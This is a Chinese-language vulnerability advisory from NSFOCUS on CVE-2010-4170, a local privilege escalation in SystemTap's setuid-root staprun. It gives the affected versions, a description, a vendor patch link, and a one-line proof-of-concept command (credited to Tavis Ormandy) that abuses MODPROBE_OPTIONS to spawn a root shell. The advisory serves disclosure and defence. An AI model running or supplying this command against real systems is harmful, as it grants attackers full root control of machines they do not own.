安全研究
安全漏洞
SystemTap "modprob"命令环境变量本地权限提升漏洞
发布日期:2010-01-01
更新日期:2010-11-30
受影响系统:RedHat Enterprise Linux WS 4
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux Desktop 4
RedHat Enterprise Linux AS 4 Extras
AVAYA Message Storage Server 5.1
AVAYA Message Storage Server 5.0
AVAYA Message Storage Server 4.0
SystemTap SystemTap 1.1
SystemTap SystemTap 1.0
SystemTap SystemTap 0.0.20090314
SystemTap SystemTap 0.0.20080705
描述:
BUGTRAQ ID:
44914
CVE ID:
CVE-2010-4170
SystemTap是一种Linux内核诊断工具,允许从运行的Linux内核快速和安全的获取信息。
SystemTap的实现上存在漏洞,本地攻击者可利用此漏洞用超级用户权限执行任意代码,并完全控制受影响的计算机。
setuid-root /usr/bin/staprun程序中存在两个严重的错误。systemtap运行时工具(staprun)没有安全地处理用户指定模块的加载,本地攻击者可利用此漏洞提升其权限。
<*来源:Tavis Ormandy (
taviso@gentoo.org)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Tavis Ormandy (
taviso@gentoo.org)提供了如下测试方法:
printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C
exploit.conf" staprun -u whatever
建议:
厂商补丁:
SystemTap
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://sourceware.org/systemtap/浏览次数:2910
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |